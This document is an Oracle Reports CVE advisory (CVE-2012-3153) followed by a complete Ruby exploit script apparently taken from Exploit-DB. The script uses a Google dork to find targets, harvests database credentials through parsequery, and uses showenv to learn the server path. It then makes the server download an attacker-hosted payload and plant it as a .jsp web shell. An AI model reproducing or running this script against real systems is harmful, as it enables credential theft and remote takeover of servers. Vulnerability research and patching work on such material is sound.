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Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the PARSEQUERY function allows remote attackers to obtain database credentials via reports/rwservlet/parsequery, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3152 to execute arbitrary code by uploading a .jsp file.
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Publication date : 2014-01-28 23h00 +00:00 Author : Mekanismen EDB Verified : No
#!/usr/bin/env ruby
# Exploit Title: Oracle Reports 11.1
# About: Automated exploit for CVE-2012-3153/CVE-2012-3152
# Google Dork: inurl:/reports/rwservlet/
# Date: 01/28/2014
# Exploit Author: Mekanismen <mattias@gotroot.eu>
# Credits to: @miss_sudo for initial disclosure
# Reference: http://netinfiltration.com/
# Vendor Homepage: http://www.oracle.com/
# Version: 11.1
# Tested on: Linux
# CVE-2012-3153
# CVE-2012-3152
require 'uri'
require 'open-uri'
require 'openssl'
#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
def upload_payload(dest)
url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
#print url
begin
uri = URI.parse(url)
html = uri.open.read
rescue
html = ""
end
if html =~ /Successfully run/
@hacked = true
print "[+] Payload uploaded!\n"
else
print "[-] Payload uploaded failed\n"
end
end
def getenv(server, authid)
print "[+] Found server: #{server}\n"
print "[+] Found credentials: #{authid}\n"
print "[*] Querying showenv ... \n"
begin
uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}")
html = uri.open.read
rescue
html = ""
end
if html =~ /\/(.*)\/showenv/
print "[+] Query succeeded, uploading payload ... \n"
upload_payload($1)
else
print "[-] Query failed... \n"
end
end
@payload_url = "" #the url that holds our payload (we can execute .jsp on the server)
@url = "" #url to compromise
@hacked = false
@payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp"
print "[*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n"
print "[*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n"
print "[*] Credits to: @miss_sudo\n"
unless ARGV[0] and ARGV[1]
print "[-] Usage: ./pwnacle.rb target_url payload_url\n"
exit
end
@url = ARGV[0]
@payload_url = ARGV[1]
print "[*] Target URL: #{@url}\n"
print "[*] Payload URL: #{@payload_url}\n"
print "[*] Payload name: #{@payload_name}\n"
begin
#Can we view keymaps?
uri = URI.parse("#{@url}/reports/rwservlet/showmap")
html = uri.open.read
rescue
print "[-] URL not vulnerable or unreachable\n"
exit
end
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
#Parse keymaps for servers
print "[*] Enumerating keymaps ... \n"
test.each do |t|
if not @hacked
t = t.delete(' ')
url = "#{@url}/reports/rwservlet/parsequery?#{t}"
begin
uri = URI.parse(url)
html = uri.open.read
rescue
end
#to automate exploitation we need to query showenv for a local path
#we need a server id and creds for this, we enumerate the keymaps and hope for the best
#showenv tells us the local PATH of /reports/ where we upload the shell
#so we can reach it from /reports/images/<shell>.jsp
if html =~ /userid=(.*)@/
authid = $1
end
if html =~ /server=(\S*)/
server = $1
end
if server and authid
getenv(server, authid)
end
else
break
end
end
if @hacked
print "[*] Server hopefully compromised!\n"
print "[*] Payload url: #{@url}/reports/images/#{@payload_name}\n"
else
print "[*] Enumeration done ... no vulnerable keymaps for automatic explotation found :(\n"
#server is still vulnerable but cannot be automatically exploited ... i guess
end